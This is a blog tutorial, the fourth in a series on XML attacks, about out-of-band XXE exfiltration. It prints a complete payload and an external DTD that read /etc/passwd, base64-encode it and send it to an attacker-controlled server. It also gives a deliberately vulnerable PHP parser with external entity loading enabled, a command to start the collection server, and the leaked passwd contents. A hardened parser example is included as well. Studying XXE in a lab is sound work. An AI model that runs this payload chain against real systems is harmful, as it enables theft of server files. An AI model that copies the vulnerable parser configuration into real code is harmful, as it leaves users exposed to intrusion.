XML Attacks Part 4 : Out Of Band (OOB) Attacks

In XML attacks there are situations where an attacker sends the XML payload to the target application, but the web application is not designed to return a response, so the attacker would never know whether the payload worked or not. This situation is known as an Out Of Band (OOB) attack.

But there is a way to get the response from the web application in an Out Of Band situation: force the XML parser to make an additional request to an attacker-controlled server, with the data extracted from the web server carried inside that request.

Now in this attack there are three main components :
  • Payload
  • file.dtd (XML external entity declaration file)
  • An attacker-controlled server (to collect the data)
Our payload is :

doc.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE book [
  <!ENTITY % remote SYSTEM "http://serveraddress/file.dtd">
  %remote;
  %newEnt;
  %send;
]>
<book>
  <name>The Art of War</name>
  <author>Sun Tzu</author>
  <price>370</price>
</book>
In the above payload the "%remote;" parameter entity reference includes the external DTD file. The content of the DTD file is :

file.dtd :
<!ENTITY % dat SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % newEnt "<!ENTITY &#x25; send SYSTEM 'http://serveraddress/?data=%dat;'>">

Note that in the payload :

  • At line 4, "%remote;" includes file.dtd into the XML document.
  • At line 5, the entity "%newEnt;", which is declared in file.dtd, declares a new parameter entity "send" that makes an additional request to the attacker-controlled server; the data is appended at the end of the URL by "%dat;" (look at the 2nd line of file.dtd), and "%dat" is itself declared within file.dtd. The "%send;" reference at line 6 then triggers the request.
  • Also note that in file.dtd the "&#x25;" inside the entity value is nothing but the hexadecimal character reference for "%": a literal "%" followed by a name inside an entity value would be read by the XML parser as a parameter entity reference. The file "/etc/passwd" is base64 encoded because its newlines and special characters would otherwise break the URL and the parsing of the data.
Now let's first customize our XML parser so that it does not show the result. The code is :

parser.php
<html>
<head>
  <title>XML Parser</title>
</head>
<body>
  <h2>Enter XML Code Here :</h2>
  <form action="" method="post">
    <textarea name="xml" rows="10" cols="50"></textarea><br/>
    <input type="submit" value="Submit"/>
  </form>

<?php

  if(!empty($_POST["xml"])) {
    // Re-enable the external entity loader: external DTDs and entities may be fetched
    libxml_disable_entity_loader(false);
    $xmlfile = $_POST["xml"];
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities, LIBXML_DTDLOAD loads the external DTD (file.dtd)
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    // The parsed document is never echoed back, so nothing is returned in the response
    $book = simplexml_import_dom($dom);
  }

?>

</body>
</html>
The above PHP code does not show any output, so the usual in-band XXE response channel is gone.
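As an added example (not the post's own code), here is a hardened version of the same parser that closes the out-of-band channel: it refuses any DOCTYPE before parsing, drops the LIBXML_NOENT and LIBXML_DTDLOAD flags, and keeps the external entity loader disabled. The function name parseBookXml and the two inline sample documents are constructed for this example.

```php
<?php
// Added example: hardened replacement for the parser above (not the post's own code).
// Defence in depth: refuse any DOCTYPE before parsing, never pass LIBXML_NOENT or
// LIBXML_DTDLOAD, and keep the external entity loader disabled.

function parseBookXml(string $xml): ?SimpleXMLElement
{
    // 1. A document that needs no DTD has no business carrying one. Rejecting
    //    <!DOCTYPE up front stops both the internal subset (%remote;) and the
    //    external file.dtd fetch before libxml ever sees them.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }

    // 2. libxml_disable_entity_loader(true) blocks external entity/DTD fetches on
    //    PHP < 8.0 (from 8.0 it is deprecated because the loader is off by default).
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }

    // 3. Collect parse errors instead of printing them (error text can leak data).
    $previous = libxml_use_internal_errors(true);

    $dom = new DOMDocument();
    // No LIBXML_NOENT (no entity substitution) and no LIBXML_DTDLOAD (no external
    // DTD). LIBXML_NONET additionally forbids any network access while parsing.
    $ok = $dom->loadXML($xml, LIBXML_NONET);

    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if ($ok === false) {
        return null;
    }
    return simplexml_import_dom($dom);
}

// Constructed inputs: the payload shape from this post is refused, a plain
// document without a DOCTYPE is accepted and parsed normally.
$malicious = '<?xml version="1.0"?><!DOCTYPE book [<!ENTITY % remote SYSTEM '
           . '"http://serveraddress/file.dtd">%remote;]><book/>';
$benign    = '<?xml version="1.0"?><book><name>The Art of War</name>'
           . '<author>Sun Tzu</author><price>370</price></book>';

var_dump(parseBookXml($malicious) === null);
var_dump((string) parseBookXml($benign)->author);
```

The DOCTYPE check is the important control: it works regardless of which libxml flags a later developer adds to loadXML().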

First start a Python HTTP server on your system with
 python -m SimpleHTTPServer 
It starts a Python HTTP server on port 8000, and file.dtd is placed in the directory served by this same HTTP server. After sending the payload to the target application, we get the following output on our Python web server.


and the decoded base64 data is :
ajay@DevM:~$ echo "cm9vdDp4OjA6MDpy......vYmluL2Jhc2gK" | base64 -d

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
ajay:x:1000:1000:ajay,,,:/home/ajay:/bin/bash

Conclusion :

In these posts we have looked at some of the attack vectors that are used to exploit XML parser functionality.

The code used above can be downloaded from here : Github_link

XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 2 : XXE (Xml eXternal Entity ) Attack
XML Attacks Part 3 : Denial Of Service Attacks

To learn more about web application security please visit the link below :

        http://www.sec-art.net/p/web-security.html